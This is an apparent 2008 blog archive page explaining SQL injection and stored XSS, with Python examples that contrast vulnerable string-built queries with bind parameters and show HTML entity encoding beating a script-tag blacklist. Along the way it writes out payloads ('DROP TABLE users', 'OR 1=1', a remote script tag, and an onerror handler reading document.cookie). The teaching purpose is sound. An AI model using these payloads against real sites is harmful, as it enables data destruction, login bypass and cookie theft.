
Archive for December, 2008

So, what is SQL Injection and how do I stop it?

December 29th, 2008

SQL injection is bad…  Put most simply, it happens when you build a SQL statement by gluing user input into the query text, so the input gets parsed as SQL instead of being treated as data.  How do you prevent it?  The defence that actually works is to never compose SQL from user input without bind parameters (prepared statements): the query text stays fixed and the values travel separately, so a quote character in the input stays a quote character.  Restricting the database driver to one statement per call is often cited as a fix, and the classic PHP mysql_query() function does refuse more than one statement per call, but that only blocks stacked-query payloads ('; DROP TABLE users; --).  A payload that stays inside the single statement, such as ' OR 1=1 -- in a WHERE clause or an appended UNION SELECT, goes straight through.  An ORM is not required to prevent SQL injection, since underneath it just uses bind parameters for you, but using one makes the whole world go round better, so just bite the learning curve bullet and use one.  Your productivity will go up at least 100%.

xkcd has a wonderful comic that illustrates how SQL injection takes place: http://xkcd.com/327/
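The two points above, vulnerable string building next to bind parameters, and why "one statement per call" is not enough, as an added example that is not part of the original post. It is written in Python against an in-memory SQLite database rather than in PHP, because the same driver behaviour is easy to show there: sqlite3 refuses more than one statement per call, exactly the restriction the post describes, and the WHERE-clause payload still bypasses the login. The users table and its passwords are constructed for this example (plaintext only to keep it short).

```python
import sqlite3

# Constructed sample data for this example; real applications store password
# hashes, never plaintext. Names and secrets are made up.
SAMPLE_USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db():
    """In-memory SQLite database seeded with the constructed users above."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, name, password):
    """The bug: user input is pasted into the SQL text, so it becomes SQL syntax."""
    sql = ("SELECT COUNT(*) FROM users WHERE name = '%s' AND password = '%s'"
           % (name, password))
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn, name, password):
    """Same check with bind parameters: the query text is fixed, the values are
    handed to the driver separately, and a quote in the input stays data."""
    sql = "SELECT COUNT(*) FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone()[0] > 0


def stacked_payload_rejected(conn):
    """sqlite3 executes only one statement per call ('one query per call').
    That does stop a stacked payload: the query becomes
      SELECT COUNT(*) FROM users WHERE name = 'alice'; DROP TABLE users; --' AND ...
    and the driver refuses it. A driver that allowed it would drop the table."""
    try:
        login_vulnerable(conn, "alice'; DROP TABLE users; --", "x")
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        # "You can only execute one statement at a time." (exception class
        # depends on the Python version, hence both are caught)
        return True
    return False


def where_clause_payload_bypasses(conn):
    """...but a payload that stays inside the one statement still wins.
    The query becomes
      SELECT COUNT(*) FROM users WHERE name = '' OR 1=1 --' AND password = 'x'
    which is a single valid statement that matches every row, so the
    'wrong' password logs in. The single-statement limit does nothing here."""
    return login_vulnerable(conn, "' OR 1=1 --", "x")


if __name__ == "__main__":
    db = make_db()
    print("stacked payload rejected by driver:", stacked_payload_rejected(db))
    print("WHERE-clause payload bypasses vulnerable login:",
          where_clause_payload_bypasses(db))
    print("same payload against bound query:", login_safe(db, "' OR 1=1 --", "x"))
```

Run it and the last two lines are the whole argument: the bypass succeeds against the concatenated query and fails against the bound one, with the driver's one-statement rule in force for both.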


So, “XSS Attacks” What are they and how do I prevent them?

December 29th, 2008

XSS means "Cross Site Scripting". The XSS attack described here (stored XSS) happens whenever a user of a website posts content containing markup or script that your site then sends to other users' browsers, where it runs as JavaScript with the full privileges of your site. Pretty simple huh? How do you avoid it? It is a piece of cake. HTML entity encode ALL user generated content at the point where you output it into a page.  For content that lands in an HTML body or attribute, that's the whole defence (content you place inside a JavaScript block or a URL needs the escaping for that context instead).  How do I do that you ask?  Keep reading.

First, an example. You run a simple blog. When a user posts comments, you store the user's nickname and display it next to their comment… A malicious user enters the following for his nickname: <script src="http://lolcatz/hack.js"></script> Now, obviously that isn't his nickname. Instead, it is an HTML tag that tells a web browser to load and run the script at http://lolcatz/hack.js. What does this script do? Anything on your site that a logged in user can do: it runs in your site's origin, so it can read the page, send requests with the victim's cookies, and act on their behalf. So Bob creates the malicious comment, then Jimmy comes by your site, views your article, and his browser gets Bob's malicious script tag. Now the script can do anything it wants on your site while pretending to be Jimmy, not Bob.

In PHP, wrap the variable you are printing with echo in htmlentities(): echo htmlentities($nickname, ENT_QUOTES, 'UTF-8');  This converts <'s to &lt;, >'s to &gt; and "'s to &quot; (pass ENT_QUOTES so single quotes are converted as well, otherwise a value printed inside a single-quoted attribute can still break out of it).  This defangs the malicious content.  Instead of your user's browser seeing a script tag, it just sees text that when rendered appears to the user as a script tag, but doesn't do anything.  You need to do this each and EVERY time you print user generated content, and do it on output rather than when the content is stored: you cannot know today every context the stored text will be printed into.  The other option is to find some script that parses user generated content and strips out script tags, but a blacklist like that misses event handler attributes (onerror, onload) and the other ways to get script into a page without a script tag, so I prefer just HTML encoding everything.
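The encoding step from this post as an added example, not code from the original. It is written in Python (html.escape with quote=True does what htmlentities($s, ENT_QUOTES, 'UTF-8') does in PHP) so it can run stand-alone; the comment template, the nickname from the post and the second payload with no script tag at all are constructed for the example. It also shows why the "strip script tags" alternative loses: the regex blacklist removes the script tag but leaves an onerror handler untouched, while output encoding neutralises both.

```python
import html
import re

# Constructed payloads: the nickname from the post, and one that carries no
# <script> tag but still executes JavaScript via an event handler attribute.
SCRIPT_NICKNAME = '<script src="http://lolcatz/hack.js"></script>'
EVENT_HANDLER_NICKNAME = '<img src=x onerror="alert(document.cookie)">'


def encode_for_html(text):
    """HTML-entity encode untrusted text for an HTML body or attribute value.
    quote=True also converts " and ' (the ENT_QUOTES behaviour), so the value
    cannot close a quoted attribute and start a new one."""
    return html.escape(text, quote=True)


def render_comment(nickname, body):
    """Server-side template for one comment. The nickname is printed twice,
    once inside a title="..." attribute and once as visible text, and is
    encoded at output in both places; nothing is trusted from storage."""
    safe_nick = encode_for_html(nickname)
    safe_body = encode_for_html(body)
    return ('<div class="comment" title="by %s">'
            '<b>%s</b> wrote: %s</div>' % (safe_nick, safe_nick, safe_body))


def strip_script_tags(text):
    """The 'strip out any script tags' alternative mentioned in the post: a
    blacklist that only knows about <script>. Shown here to be compared
    against encoding, not recommended."""
    return re.sub(r"<\s*/?\s*script[^>]*>", "", text, flags=re.IGNORECASE)


if __name__ == "__main__":
    print(render_comment(SCRIPT_NICKNAME, 'first post'))
    print(render_comment(EVENT_HANDLER_NICKNAME, 'second post'))
    print("blacklist on script tag   ->", repr(strip_script_tags(SCRIPT_NICKNAME)))
    print("blacklist on event handler ->", repr(strip_script_tags(EVENT_HANDLER_NICKNAME)))
```

The second "blacklist" line prints the img payload unchanged: it contains no script tag, so the stripper passes it through and the browser would run the onerror handler. The encoded versions above it render the same text harmlessly as &lt;img ...&gt;.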


So, you want a blink tag right?

December 29th, 2008

Remember the good old days of the internet? HTML had just hit 2.0, making a site cross-browser compatible meant putting comment tags around JavaScript code… XSS didn't exist. Perl was your only CGI option. There was a wonderful site back then called htmlgoodies.com. Articles were written to be humorous yet informative. And every article started with "So, you want (insert HTML / JavaScript thing here) huh?" Then something happened. Someone bought htmlgoodies.com (Either that or the Author got hi) and the quality went down the tubes. The site got ugly. I mean UGLY. Well, a lot has happened since then. The technologies evolved rapidly. So much so that today, to leverage the web, it isn't so much about knowing the ins and outs of each technology, but rather knowing about patterns, and the available building blocks that you can plug in where you want to achieve your goals. This site is dedicated to showing you some of these building blocks and how to use them.
